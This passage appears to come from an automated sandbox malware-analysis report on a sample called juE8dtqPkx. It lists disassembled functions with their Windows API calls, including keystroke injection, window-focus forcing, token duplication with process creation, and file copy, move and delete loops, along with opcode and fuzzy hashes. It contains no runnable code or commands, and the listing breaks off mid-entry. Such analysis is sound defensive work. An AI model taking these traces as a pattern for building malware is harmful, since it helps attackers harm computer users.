                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2999321469-0
                                                    • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                    • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                    • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                    • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 7d4bf282be97faa598aef49f35025b485b6d7313d47a9894d7d30610d981dab9
                                                    • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                    • Opcode Fuzzy Hash: 7d4bf282be97faa598aef49f35025b485b6d7313d47a9894d7d30610d981dab9
                                                    • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4dcdcbe9ad79790a1096564f6089ef7e9ebf333e554a3dff892159d4d739e5a4
                                                    • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                    • Opcode Fuzzy Hash: 4dcdcbe9ad79790a1096564f6089ef7e9ebf333e554a3dff892159d4d739e5a4
                                                    • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __lock_file
                                                    • String ID:
                                                    • API String ID: 3031932315-0
                                                    • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                    • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                    • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                    • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 004142F5
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2597487223-0
                                                    • Opcode ID: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                    • Instruction ID: 8e443c470cd329b51aa0b2c66eafbe77d500ce91655981cf057e69b52ab9faa9
                                                    • Opcode Fuzzy Hash: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                    • Instruction Fuzzy Hash: 34F0C230A00219EBCF11BFB188024DF7B71EF44754F01845BF4205A151C73C8AD1EB99
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                    • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                    • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                    • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 00A822B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2183327966.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_a80000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction ID: d4669988423c065a8bc61cc9238564200a6d6ba71e5cc5bc1eeaf342f7b05751
                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction Fuzzy Hash: A8E0BF7494010EEFDB00EFA4D5496EE7BB4EF04311F1005A1FD05D7680DB309E548B62
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 00A822B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2183327966.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_a80000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction ID: 45e43214f43586f62719fb8f208e9d9b937041dd34441aab654499a6621e18f8
                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction Fuzzy Hash: 6EE0BF7494010E9FDB00EFA4D5496AE7BB4EF04301F100161FD0192280D63099508A62
                                                    APIs
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                    • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                    • GetKeyState.USER32(00000011), ref: 0047C92D
                                                    • GetKeyState.USER32(00000009), ref: 0047C936
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                    • GetKeyState.USER32(00000010), ref: 0047C953
                                                    • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                    • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                    • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                    • _wcsncpy.LIBCMT ref: 0047CA29
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                    • SendMessageW.USER32 ref: 0047CA7F
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                    • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                    • ImageList_SetDragCursorImage.COMCTL32(00AEF6D8,00000000,00000000,00000000), ref: 0047CB9B
                                                    • ImageList_BeginDrag.COMCTL32(00AEF6D8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                    • SetCapture.USER32(?), ref: 0047CBB6
                                                    • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                    • ReleaseCapture.USER32 ref: 0047CC3A
                                                    • GetCursorPos.USER32(?), ref: 0047CC72
                                                    • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                    • SendMessageW.USER32 ref: 0047CD12
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                    • SendMessageW.USER32 ref: 0047CD80
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                    • GetCursorPos.USER32(?), ref: 0047CDC8
                                                    • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                    • GetParent.USER32(00000000), ref: 0047CDF7
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                    • SendMessageW.USER32 ref: 0047CE93
                                                    • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,00AA1BD8,00000000,?,?,?,?), ref: 0047CF1C
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                    • SendMessageW.USER32 ref: 0047CF6B
                                                    • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,00AA1BD8,00000000,?,?,?,?), ref: 0047CFE6
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F
                                                    • API String ID: 3100379633-4164748364
                                                    • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                    • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                    • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                    • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00434420
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                    • IsIconic.USER32(?), ref: 0043444F
                                                    • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                    • SetForegroundWindow.USER32(?), ref: 0043446A
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                    • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                    • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                    • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                    • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                    • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                    • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                    • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                    • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 2889586943-2988720461
                                                    • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                    • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                    • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                    • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                    APIs
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                    • CloseHandle.KERNEL32(?), ref: 004463A0
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                    • GetProcessWindowStation.USER32 ref: 004463D1
                                                    • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                    • _wcslen.LIBCMT ref: 00446498
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • _wcsncpy.LIBCMT ref: 004464C0
                                                    • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                    • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                    • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                    • CloseDesktop.USER32(?), ref: 0044657A
                                                    • SetProcessWindowStation.USER32(?), ref: 00446588
                                                    • CloseHandle.KERNEL32(?), ref: 00446592
                                                    • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                    • String ID: $@OH$default$winsta0
                                                    • API String ID: 3324942560-3791954436
                                                    • Opcode ID: 008551255289e0f64750cc90ca1d548d2031df532aac26d7c63e55199363bc36
                                                    • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                    • Opcode Fuzzy Hash: 008551255289e0f64750cc90ca1d548d2031df532aac26d7c63e55199363bc36
                                                    • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 004096C1
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • _memmove.LIBCMT ref: 0040970C
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                    • _memmove.LIBCMT ref: 00409D96
                                                    • _memmove.LIBCMT ref: 0040A6C4
                                                    • _memmove.LIBCMT ref: 004297E5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                    • String ID:
                                                    • API String ID: 2383988440-0
                                                    • Opcode ID: 26df9de89e9dd6c6179e0631cd1d4805d277a0ef3dd1f7b525aa0345b94d5c26
                                                    • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                    • Opcode Fuzzy Hash: 26df9de89e9dd6c6179e0631cd1d4805d277a0ef3dd1f7b525aa0345b94d5c26
                                                    • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                    APIs
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                      • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                      • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                      • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • _wcscat.LIBCMT ref: 0044BD94
                                                    • _wcscat.LIBCMT ref: 0044BDBD
                                                    • __wsplitpath.LIBCMT ref: 0044BDEA
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                    • _wcscpy.LIBCMT ref: 0044BE71
                                                    • _wcscat.LIBCMT ref: 0044BE83
                                                    • _wcscat.LIBCMT ref: 0044BE95
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                    • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                    • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                    • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                    • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 2188072990-1173974218
                                                    • Opcode ID: 7a8d5f8610d379da30b712c8117f4eed38144bb63bbd26685d4741f30de440db
                                                    • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                    • Opcode Fuzzy Hash: 7a8d5f8610d379da30b712c8117f4eed38144bb63bbd26685d4741f30de440db
                                                    • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                    • FindClose.KERNEL32(00000000), ref: 00478924
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
